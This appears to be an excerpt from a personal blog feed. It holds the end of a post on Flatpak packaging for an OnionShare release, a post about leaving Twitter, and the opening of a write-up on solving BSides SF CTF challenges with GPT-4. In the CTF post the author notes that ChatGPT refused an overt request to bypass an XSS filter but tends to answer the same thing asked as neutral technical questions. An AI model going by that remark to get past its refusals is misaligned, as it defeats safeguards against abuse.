<span class="n">requirements</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">dep</span><span class="p">,</span> <span class="n">version</span> <span class="ow">in</span> <span class="n">dependencies</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="n">dep</span> <span class="o">==</span> <span class="s2">"python"</span> <span class="ow">or</span> <span class="n">dep</span> <span class="o">==</span> <span class="s2">"onionshare_cli"</span><span class="p">:</span>
<span class="k">continue</span>
<span class="n">formatted</span> <span class="o">=</span> <span class="n">format_version</span><span class="p">(</span><span class="n">dep</span><span class="p">,</span> <span class="n">version</span><span class="p">)</span>
<span class="k">if</span> <span class="n">formatted</span><span class="p">:</span>
<span class="n">requirements</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">formatted</span><span class="p">)</span>
<span class="k">for</span> <span class="n">req</span> <span class="ow">in</span> <span class="n">requirements</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">req</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">poetry_to_requirements</span><span class="p">()</span>
</pre></div>
<p>Here's the output when I run it on <code>cli/pyproject.toml</code>:</p>
<pre><code>$ ./poetry-to-requirements.py ../cli/pyproject.toml
click
flask==2.3.2
flask-compress>=1.13.0
flask-socketio==5.3.4
psutil
pysocks
requests
unidecode
urllib3
eventlet
setuptools
pynacl
colorama
gevent-websocket
stem==1.8.1
waitress>=2.1.2.0
werkzeug>=2.3.4
</code></pre>
<p>And here's the output when I run it on <code>desktop/pyproject.toml</code>:</p>
<pre><code>$ ./poetry-to-requirements.py ../desktop/pyproject.toml
PySide6==6.5.2
qrcode
werkzeug
python-gnupg
</code></pre>
<p>Excellent. So, now I'm going to use this new script, along with <code>flatpak-pip-generator</code> from flatpak-builder-tools:</p>
<pre><code>$ cd flatpak-builder-tools/pip
$ ./flatpak-pip-generator $(../../onionshare/flatpak/poetry-to-requirements.py ../../onionshare/cli/pyproject.toml)
========================================================================
Downloading sources
========================================================================
Running: "pip3 download --exists-action=i --dest /tmp/pip-generator-python3-modules7s7_v9xw -r /tmp/requirements.gnj3l2ng"
Collecting click
Using cached click-8.1.7-py3-none-any.whl (97 kB)
Collecting flask==2.3.2
Using cached Flask-2.3.2-py3-none-any.whl (96 kB)
--snip--
Generating dependencies for stem
Generating dependencies for waitress
Generating dependencies for werkzeug
Output saved to python3-modules.json
</code></pre>
<p>It created the file <code>python3-modules.json</code> (in JSON format), so I'm going to use the script that comes with flatpak-builder-tools to convert it to YAML:</p>
<div class="hll"><pre><span></span>../flatpak-json2yaml.py<span class="w"> </span>./python3-modules.json
mv<span class="w"> </span>python3-modules.yml<span class="w"> </span>onionshare-cli.yaml
</pre></div>
<p>Now <code>onionshare-cli.yaml</code> should have the CLI dependencies. While I'm at it, I'll do the same thing for the GUI version:</p>
<pre><code>$ ./flatpak-pip-generator $(../../onionshare/flatpak/poetry-to-requirements.py ../../onionshare/desktop/pyproject.toml)
========================================================================
Downloading sources
========================================================================
Running: "pip3 download --exists-action=i --dest /tmp/pip-generator-python3-modulesjl9ykpn9 -r /tmp/requirements.05kucdaf"
Collecting PySide6==6.5.2
Downloading PySide6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl (6.7 kB)
Collecting qrcode
Downloading qrcode-7.4.2-py3-none-any.whl (46 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 46.2/46.2 kB 958.3 kB/s eta 0:00:00
Collecting werkzeug
Using cached werkzeug-2.3.7-py3-none-any.whl (242 kB)
Collecting python-gnupg
Downloading python_gnupg-0.5.1-py2.py3-none-any.whl (20 kB)
Collecting shiboken6==6.5.2
Downloading shiboken6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl (174 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 174.2/174.2 kB 4.0 MB/s eta 0:00:00
Collecting PySide6-Essentials==6.5.2
Downloading PySide6_Essentials-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl (81.2 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 81.2/81.2 MB 10.0 MB/s eta 0:00:00
Collecting PySide6-Addons==6.5.2
Downloading PySide6_Addons-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl (126.3 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 126.3/126.3 MB 7.9 MB/s eta 0:00:00
Collecting typing-extensions
Downloading typing_extensions-4.7.1-py3-none-any.whl (33 kB)
Collecting pypng
Downloading pypng-0.20220715.0-py3-none-any.whl (58 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 58.1/58.1 kB 3.7 MB/s eta 0:00:00
Collecting MarkupSafe>=2.1.1
Using cached MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (28 kB)
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/PySide6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/PySide6_Addons-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/PySide6_Essentials-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/shiboken6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/qrcode-7.4.2-py3-none-any.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/werkzeug-2.3.7-py3-none-any.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/python_gnupg-0.5.1-py2.py3-none-any.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/MarkupSafe-2.1.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/pypng-0.20220715.0-py3-none-any.whl
Saved /tmp/pip-generator-python3-modulesjl9ykpn9/typing_extensions-4.7.1-py3-none-any.whl
Successfully downloaded PySide6 PySide6-Addons PySide6-Essentials shiboken6 qrcode werkzeug python-gnupg MarkupSafe pypng typing-extensions
========================================================================
Downloading arch independent packages
========================================================================
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/pip/./flatpak-pip-generator", line 291, in <module>
url = get_tar_package_url_pypi(name, version)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/pip/./flatpak-pip-generator", line 91, in get_tar_package_url_pypi
raise Exception(err)
Exception: Failed to get shiboken6-6.5.2 source from https://pypi.org/pypi/shiboken6/6.5.2/json
</code></pre>
<p>Ahh yes, I knew there was a reason why I manually included PySide6 in the Flatpak manifest earlier--it's because you can't download architecture-independent versions of it from PyPI--it's only available for x86_64. I'll handle this by just grepping PySide6 out of the <code>requirements.txt</code> file:</p>
<div class="hll"><pre><span></span>./flatpak-pip-generator<span class="w"> </span><span class="k">$(</span>../../onionshare/flatpak/poetry-to-requirements.py<span class="w"> </span>../../onionshare/desktop/pyproject.toml<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-v<span class="w"> </span>PySide6<span class="k">)</span>
</pre></div>
<p>That worked and generated a new <code>python3-modules.json</code>. Now I'll convert it to YAML too.</p>
<div class="hll"><pre><span></span>../flatpak-json2yaml.py<span class="w"> </span>./python3-modules.json
mv<span class="w"> </span>python3-modules.yml<span class="w"> </span>onionshare-desktop.yaml
</pre></div>
<p>Now that I have <code>onionshare-desktop.yaml</code> and <code>onionshare-cli.yaml</code>, I'm opening these files and copying and pasting the content into my Flatpak manifest for the <code>onionshare</code> and <code>onionshare-cli</code> modules. I'm finally ready to test it!</p>
<p>I updated <code>RELEASE.md</code> to explain all of these new steps, including using the new <code>poetry-to-requirements.py</code> script I wrote, and commited my changes.</p>
<h3 id="testing-flatpak">Testing Flatpak</h3><p>Alright, let's build the Flatpak package:</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
Dependency Sdk: org.kde.Sdk 6.4
Installing org.kde.Sdk/x86_64/6.4 from flathub
Info: org.kde.Sdk is end-of-life, with reason: We strongly recommend moving to the latest stable version of the Plaform and SDK
Info: org.kde.Sdk.Locale is end-of-life, with reason: We strongly recommend moving to the latest stable version of the Plaform and SDK
Installing runtime/org.freedesktop.Platform.GL.default/x86_64/22.08
Installing runtime/org.freedesktop.Platform.GL.default/x86_64/22.08-extra
^C
</code></pre>
<p>I pressed CTRL-C to cancel early because I noticed this warning:</p>
<blockquote><p>Info: org.kde.Sdk is end-of-life, with reason: We strongly recommend moving to the latest stable version of the Plaform and SDK</p>
</blockquote>
<p>When I run <code>flatpak search org.kde.Sdk</code> I see that the latest version of the <code>org.kde.Sdk</code> runtime is 6.5, but my Flatpak manifest file is using 6.4. I updated it to 6.5 and then tried again:</p>
<pre><code>flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
</code></pre>
<p>Great, it's not showing the warning when I use the new runtime. However, when it got to the "downloading sources" step, it crashed with this error:</p>
<pre><code>Initialized empty Git repository in /home/user/code/onionshare/.flatpak-builder/git/https_filippo.io_edwards25519.git-3QRMA2/
remote: 404 page not found
fatal: repository 'https://filippo.io/edwards25519.git/' not found
Failed to download sources: module obfs4proxy: Child process exited with code 128
</code></pre>
<p>Unfortunately it looks like there's an issue with my Go dependencies--which basically means there's an issue with the <code>flatpak-go-deps.py</code> script I wrote in <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">my flatpak-builder-tools PR</a>. <em>🎵 Debugging noises... 🎵</em></p>
<h3 id="fixing-flatpak-go-deps-py-script">Fixing <code>flatpak-go-deps.py</code> script</h3><p>Here's the source from the Flatpak manifest that the <code>flatpak-builder</code> command above choked on:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/filippo/io/edwards25519</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.0.0-rc.1.0.20210721174708-390f27c3be20</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://filippo.io/edwards25519.git</span>
</pre></div>
<p>After spending a lot of time looking into how Go package resolution works, and how Go figures out the git URLs for packages, I realized that I needed to update my <code>flatpak-go-deps.py</code> script to make HTTP requests and parse the responses in order to accurately discover git URLs.</p>
<p>It turns out, even though there's a Go package called <code>filippo.io/edwards25519</code>, and Go package names tend to map to git repo URLs, this isn't actually always the case, and <code>https://filippo.io/edwards25519.git</code> is not a valid git repo URL. I needed to make my code make an HTTP requests to <code>https://filippo.io/edwards25519/?go-get=1</code> and then use BeautifulSoup to parse the response for a <code>go-import</code> meta tag, and <em>that</em> includes the real git URL, which in this case is <code>https://github.com/FiloSottile/edwards25519</code>.</p>
<p>But that wasn't the only problem. There were <em>many</em> more, including:</p>
<ul>
<li>The GitLab server that hosts code for <code>meek-client</code> and <code>snowflake-client</code>, <code>git.torproject.org</code>, didn't seem to work properly with <code>?go-get=1</code> requests, so I had to make an exception for that.</li>
<li>I discovered that sometimes Go packages are pinned to git tags, but other times they're pinned to individual commits. In the block above it says the tag is <code>v1.0.0-rc.1.0.20210721174708-390f27c3be20</code>, but that's not a real git tag. Instead, it's pinned to a commit, and the short version of the commit ID is <code>390f27c3be20</code>.</li>
<li>I realized this would be much more stable if I just use commit IDs instead of tags for everything, so I started to make the code git clone every repo and check out the correct tag, so I can look up the commit IDs.</li>
<li>But then I realized that this takes <em>forever</em> to run and has to download gigabytes of source code, so I streamlined it by using the GitHub API for github.com sources, and the GitLab API for gitlab.com sources. This made it way faster, but I also started hitting GitHub API rate limits, so I added support for passing in a GitHub token to avoid the rate limits.</li>
<li>There's a lot more to this particular rabbit hole too, but I'll spare the rest of the details... In short, I still haven't gotten it working all the way. 😭</li>
</ul>
<p>In all, I spent about 6 hours (!?) fighting with my <code>flatpak-go-deps.py</code> script.</p>
<p>Instead of continuing the suffering, I decided that I just won't update the pluggable transports in the Flatpak version of this release. The versions running in OnionShare 2.6 don't have any security issues, so this will be a future me problem.</p>
<p>After all that work, I went ahead and replaced the <code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code> sections of the Flatpak manifest file with the versions from OnionShare 2.6.</p>
<h3 id="giving-up-on-go-dependencies-and-finishing-flatpak-packaging">Giving up on Go dependencies, and finishing Flatpak packaging</h3><p>And now, <em>finally</em>, the Flatpak package actually builds:</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
Installing app/org.onionshare.OnionShare/x86_64/master
Pruning cache
</code></pre>
<p>Here's what happens when I try running it:</p>
<pre><code>$ flatpak run org.onionshare.OnionShare
Traceback (most recent call last):
File "/app/bin/onionshare", line 33, in <module>
sys.exit(load_entry_point('onionshare==2.6.1', 'console_scripts', 'onionshare')())
File "/app/bin/onionshare", line 22, in importlib_load_entry_point
for entry_point in distribution(dist_name).entry_points
File "/usr/lib/python3.10/importlib/metadata/__init__.py", line 969, in distribution
return Distribution.from_name(distribution_name)
File "/usr/lib/python3.10/importlib/metadata/__init__.py", line 548, in from_name
raise PackageNotFoundError(name)
importlib.metadata.PackageNotFoundError: No package metadata was found for onionshare
</code></pre>
<p>Looking at the <code>flatpak-builder</code> logs, the <code>onionshare-cli</code> and <code>onionshare</code> Python packages actually failed with errors. Here are the logs for the <code>onionshare-cli</code> part:</p>
<pre><code>========================================================================
Building module onionshare-cli in /home/user/code/onionshare/.flatpak-builder/build/onionshare-cli-1
========================================================================
Running: cd cli && python3 setup.py install --prefix=${FLATPAK_DEST}
running install
/usr/lib/python3.10/site-packages/setuptools/_distutils/cmd.py:66: SetuptoolsDeprecationWarning: setup.py install is deprecated.
!!
********************************************************************************
Please avoid running ``setup.py`` directly.
Instead, use pypa/build, pypa/installer or other
standards-based tools.
See https://blog.ganssle.io/articles/2021/10/setup-py-deprecated.html for details.
********************************************************************************
!!
self.initialize_options()
/usr/lib/python3.10/site-packages/setuptools/_distutils/cmd.py:66: EasyInstallDeprecationWarning: easy_install command is deprecated.
!!
********************************************************************************
Please avoid running ``setup.py`` and ``easy_install``.
Instead, use pypa/build, pypa/installer or other
standards-based tools.
See https://github.com/pypa/setuptools/issues/917 for details.
********************************************************************************
!!
self.initialize_options()
Checking .pth file support in /app/lib/python3.10/site-packages/
/usr/bin/python3 -E -c pass
TEST FAILED: /app/lib/python3.10/site-packages/ does NOT support .pth files
bad install directory or PYTHONPATH
You are attempting to install a package to a directory that is not
on PYTHONPATH and which Python does not read ".pth" files from. The
installation directory you specified (via --install-dir, --prefix, or
the distutils default setting) was:
/app/lib/python3.10/site-packages/
and your PYTHONPATH environment variable currently contains:
''
Here are some of your options for correcting the problem:
* You can choose a different installation directory, i.e., one that is
on PYTHONPATH or supports .pth files
* You can add the installation directory to the PYTHONPATH environment
variable. (It must then also be on PYTHONPATH whenever you run
Python and want to use the package(s) you are installing.)
* You can set up the installation directory to support ".pth" files by
using one of the approaches described here:
https://setuptools.pypa.io/en/latest/deprecated/easy_install.html#custom-installation-locations
Please make the appropriate changes for your system and try again.
</code></pre>
<p>Here's the beginning of the <code>onionshare-cli</code> module in the Flatpak manifest:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">onionshare-cli</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd cli && python3 setup.py install --prefix=${FLATPAK_DEST}</span>
</pre></div>
<p>According to the error message, running <code>setup.py</code> directly is now deprecated. So, I replaced that build command with:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>cli<span class="w"> </span><span class="o">&&</span><span class="w"> </span>pip3<span class="w"> </span>install<span class="w"> </span>--prefix<span class="o">=</span><span class="si">${</span><span class="nv">FLATPAK_DEST</span><span class="si">}</span><span class="w"> </span>--no-deps<span class="w"> </span>.
</pre></div>
<p>The <code>onionshare</code> module (the desktop version of the app) similarly was running <code>setup.py</code> directly, so I replaced that one too.</p>
<p>Then, I tried building the Flatpak package again:</p>
<pre><code>$ flatpak-builder build --force-clean --jobs=$(nproc) --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
========================================================================
Building module onionshare-cli in /home/user/code/onionshare/.flatpak-builder/build/onionshare-cli-1
========================================================================
Running: cd cli && pip3 install --prefix=${FLATPAK_DEST} --no-deps .
Processing /run/build/onionshare-cli/cli
Installing build dependencies ... error
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> [7 lines of output]
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e1bbe0>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
WARNING: Retrying (Retry(total=3, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e1bf10>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
WARNING: Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e1bfd0>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
WARNING: Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e503a0>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
WARNING: Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NewConnectionError('<pip._vendor.urllib3.connection.HTTPSConnection object at 0x7f6294e50550>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution')': /simple/poetry-core/
ERROR: Could not find a version that satisfies the requirement poetry-core (from versions: none)
ERROR: No matching distribution found for poetry-core
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> See above for output.
note: This error originates from a subprocess, and is likely not a problem with pip.
Error: module onionshare-cli: Child process exited with code 1
</code></pre>
<p><em>🎵 Debugging noises drowning out all other sounds... 🎵</em></p>
<p>It's getting late on a Sunday night, so I think this is a good time to commit my code so far and then give up for the time being.</p>
<h2 id="pushing-back-the-release-date">Pushing back the release date</h2><p>In a few days, I'm going to Portugal for the <a href="https://wiki.digitalrights.community/index.php?title=Global_Gathering">Global Gathering Feira</a> where I'll get to hang out with many human rights activists who specialize in internet freedom that I haven't seen in forever, and also meet new ones! During the event, I will do a two-hour project showcase for OnionShare, where people can come by and ask questions about the project. I'll also do a separate project showcase for my upcoming book, <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>.</p>
<p>Last week I decided to sit down and make the OnionShare 2.6.1 release before the Global Gathering. So far I've spent (<em>...checks notes...</em>) <strong>22 hours</strong> working on this release (and writing this blog post along with it), and I still haven't even finished Linux packaging yet. It's clear that I'm not going to make my goal of finishing the release before going to Portugal. Instead, I'll finish it when I get back.</p>
<p>I've pushed all of my code:</p>
<ul>
<li>The code for this release is in the <a href="https://github.com/onionshare/onionshare/tree/release-2.6.1"><code>release-2.6.1</code> branch</a>, and here's the associated work-in-progress pull request: <a href="https://github.com/onionshare/onionshare/pull/1749">https://github.com/onionshare/onionshare/pull/1749</a></li>
<li>My work-in-progress pull request to fix Go support in flatpak-builder-tools is here: <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">https://github.com/flatpak/flatpak-builder-tools/pull/369</a></li>
</ul>
<p>If you're interested, feel free to fix all of these issues I'm running into while I'm gone! I will happily review your work and merge it into my PR.</p>
<p>And in the meantime, keep an eye out for part 2 of this post, where I will hopefully <em>actually finish the release</em>. I plan on documenting the rest of the process, including how to make polished, code-signed Windows and macOS packages, update the onionshare.org website and the documentation, publish the Homebrew package, and so on.</p>
Elon banned me from Twitter for doing journalism. Good riddance.2023-05-04T00:00:00ZMicah Leeurn:uuid:96fbae06-2478-3d3c-a4fb-494fcf3e386d<p>It's been nearly six months since Elon Musk threw one of his first tantrums as the King of Twitter and <a href="https://theintercept.com/2022/12/16/elon-musk-twitter-suspended-journalists/">banned me</a> (along with a bunch of other journalists) for tweeting about him censoring Mastodon. A few days later he "reinstated" my account but I was still <a href="https://theintercept.com/2022/12/20/elon-musk-twitter-banned-journalists/">locked out</a> until I agreed to delete my forbidden tweet that the billionaire didn't like. And I've been locked out ever since.</p>
<p><iframe src="https://infosec.exchange/@micahflee/109532940044165999/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe><script src="https://assets.infosec.exchange/embed.js" async="async"></script></p>
<p>Honestly, I highly recommend getting banned from Twitter. My quality of life has definitely improved without it.</p>
<p>Since Elon took over, Twitter has been in a steep decline that it will obviously never recover from. From what I hear, there's more fascists, more hate speech, way more anti-trans BS, more scams, way more annoying advertisement, and the place is swarming with Elon fanboys with blue checkmarks that are impossible to avoid. It just sounds gross.</p>
<p>We don't need it anymore. There are actual alternatives now: You can find me on Mastodon as <a href="https://infosec.exchange/@micahflee">@micahflee@infosec.exchange</a> and on Bluesky as <a href="https://staging.bsky.app/profile/micahflee.com">@micahflee.com</a>.</p>
<p>I decided that it's about time that I <em>actually</em> pull the plug on Twitter for good. Today I logged in and deleted the forbidden tweet so I could use my account again. And then I used it to close my DMs, mark my account as protected, delete all of my other tweets, and update my bio one last time. Good riddance.</p>
<p>The thing that prevented me from doing this many months ago is that over the years I've posted so many Twitter threads, including many that people referenced all over the internet, and I didn't want my content to die.</p>
<p>But fuck it, I also don't want my content on the steaming garbage salad that is post-Elon Twitter. So, before deleting everything, I archived some of the Twitter threads that I thought were worth keeping here to my blog. Here they are:</p>
<ul>
<li>2022-12-02 <a href="../../../2022/12/twitter-thread-response-to-matt-taibbis-first-twitter-files-tweets/">Response to Matt Taibbi's first Twitter Files Tweets</a></li>
<li>2022-04-19 <a href="../../../2022/04/twitter-thread-for-first-time-in-internet-history-russia-is-fair-game-for-cyber-attacks-and-this-is-what-it-looks-like/">For first time in internet history Russia is fair game for cyber attacks, and this is what it looks like</a></li>
<li>2022-02-15 <a href="../../../2022/02/twitter-thread-freedom-convoy-and-the-givesendgo-hacks/">"Freedom Convoy" and the GiveSendGo hacks</a></li>
<li>2021-09-28 <a href="../../../2021/09/twitter-thread-healthcare-network-led-by-simone-gold-and-americas-frontline-doctors-making-millions-off-hydroxychloroquine-and-ivermectin/">Healthcare network led by Simone Gold and America's Frontline Doctors making millions off hydroxychloroquine and ivermectin</a></li>
<li>2021-09-24 <a href="../../../2021/09/twitter-thread-epiks-utter-lack-of-security-and-terrible-decisions-boggle-my-mind/">Epik's utter lack of security & terrible decisions boggle my mind</a></li>
<li>2021-08-05 <a href="../../../2021/08/twitter-thread-327gb-of-membership-donation-and-petition-signature-records-from-the-tea-party-patriots/">327GB of membership, donation, and petition signature records from the Tea Party Patriots</a></li>
<li>2021-05-13 <a href="../../../2021/05/twitter-thread-glenn-greenwald-supporting-the-american-fascist-movement-dressed-up-as-media-criticism/">Glenn Greenwald supporting the American fascist movement dressed up as "media criticism"</a></li>
<li>2021-05-04 <a href="../../../2021/05/twitter-thread-glenn-greenwald-related-social-engineeringdeath-threats/">Glenn Greenwald-related social engineering/death threats</a></li>
<li>2020-08-17 <a href="../../../2020/08/twitter-thread-northern-california-regional-intelligence-center/">Northern California Regional Intelligence Center</a></li>
<li>2020-07-15 <a href="../../../2020/07/twitter-thread-the-blueleaks-hack-of-251-law-enforcement-websites-exposes-personal-data-of-over-700000-cops/">The BlueLeaks hack of 251 law enforcement websites exposes personal data of over 700,000 cops</a></li>
<li>2020-05-26 <a href="../../../2020/05/twitter-thread-live-tweeting-zooms-e2ee-whitepaper/">Live-tweeting Zoom's E2EE whitepaper</a></li>
</ul>
<p>Now that I've deleted everything from Twitter, here's what my account looks like:</p>
<p><img src="twitter-profile.png" alt=""></p>
<p>Adios, Twitter. Life is better without you.</p>
Capturing the Flag with GPT-42023-04-23T00:00:00ZMicah Leeurn:uuid:1d793ed2-6dc3-3f3c-9cb0-c3a41e1a670d<p>This weekend I went to BSides SF 2023 and had a blast. I went to some really interesting talks (including an <a href="https://bsidessf2023.sched.com/event/1Hztz/sleeping-with-one-ai-open-an-introduction-to-attacks-against-artificial-intelligence-and-machine-learning">excellent one</a> about adversarial machine learning), but mostly I spent my time solving CTF hacking challenges. And this time, I did it with the help of GPT-4, the latest generation of OpenAI's ChatGPT generative language model. GPT-4 straight up solved some challenges for me, which blew my mind. There were definitely several flags I got that I wouldn't have gotten without the help of GPT-4. For challenges that GPT-4 didn't solve on its own, it provided incredibly helpful tips, or quickly wrote scripts that would have been tedious or time consuming for me to write myself. Good thing there's (almost) no such thing as cheating in CTF!</p>
<p>I also found several situations where ChatGPT simply errored out and refused to give me answers. I think this was the case when it was overtly clear that I was trying to get help with hacking. For example, when I asked it how to write some JavaScript code that would bypass a specific XSS filter, and used language that made it clear that I was trying to bypass an XSS filter, it just failed with an error. It seems that ChatGPT has some nominal safeguards to prevent people from using it for malicious hacking, but if you simply ask detailed technical questions (which could be used for offense or defense), it tends to answer them.</p>
<p>All that said, I wanted to share my experience with a few challenges. This post includes write-ups for:</p>
<ul>
<li>Shamir Secret Sharing</li>
<li>perckel</li>
<li>Shell Hurdles</li>
</ul>
<p>I used GPT-4 for help on several other challenges, but these three especially impressed me. I also solved several challenges without its help--partially because it's not always easy to give it all the context it needs to answer a question. You can't, for example, send it a 30MB APK file and then ask for help reverse engineering it, or copy all of the source code for a web app into GPT-4 and ask it to find the vulnerabilities. You can get help with smaller chunks of these problems, but I could see this technology getting way more powerful in the future.</p>
<h2 id="shamir-secret-sharing">Shamir Secret Sharing</h2><p><img src="sss-challenge.png" alt=""></p>
<p>In this challenge, I had to walk around the BSides SF venue looking for QR codes to scan. In <a href="https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing">Shamir's Secret Sharing scheme</a>, a secret is divided into a certain number of parts, and if one person has a threshold of those parts they can decrypt the secret. In this case, there were 7 parts with a threshold of 5, and I wandered around and found 6 of them on QR codes. I then simply asked GPT-4 to solve the problem for me:</p>
<blockquote><p>Here are parts for Shamir Secret Sharing:</p>
<p>Share 1 of 7 (min 5): (x1, y1) = (1, 12214173319090360239218007) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 3 of 7 (min 5): (x3, y3) = (3, 272214528378786743506941922) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 4 of 7 (min 5): (x4, y4) = (4, 404905998942651879217397287) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 5 of 7 (min 5): (x5, y5) = (5, 589183787842889173793388269) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 6 of 7 (min 5): (x6, y6) = (6, 338337360147368973687481536) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 7 of 7 (min 5): (x7, y7) = (7, 479528534189573769684386994) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>How do I decrypt the secret?</p>
</blockquote>
<p>And GPT-4 delivered.</p>
<p><img src="chatgpt-sss.png" alt=""></p>
<p>Wow. Does it work? I copied the Python script into <code>decrypt.py</code> and tried running it.</p>
<pre><code>$ python3 decrypt.py
CTF{perasperaadastra}
</code></pre>
<p>Holy shit. Mind blown. Especially because this challenge actually includes a very tricky part related to base-27, but GPT-4 just solved it all on the first try, without additional prompting.</p>
<p>I submitted the flag and got the points.</p>
<h1 id="perckel">perckel</h1><p><img src="perckel-challenge.png" alt=""></p>
<p>I downloaded the file <code>flag.bin</code>, and then tried to figure out what this file is by running <code>file</code> on it.</p>
<pre><code>$ file flag.bin
flag.bin: perl Storable (v0.7) data (network-ordered) (major 2) (minor 11)
</code></pre>
<p>I had no idea what this is and it's been well over a decade since I wrote any code in Perl, so I asked GPT-4.</p>
<blockquote><p>What is this file?</p>
<p>flag.bin: perl Storable (v0.7) data (network-ordered) (major 2) (minor 11)</p>
</blockquote>
<p><img src="chatgpt-perckel1.png" alt=""></p>
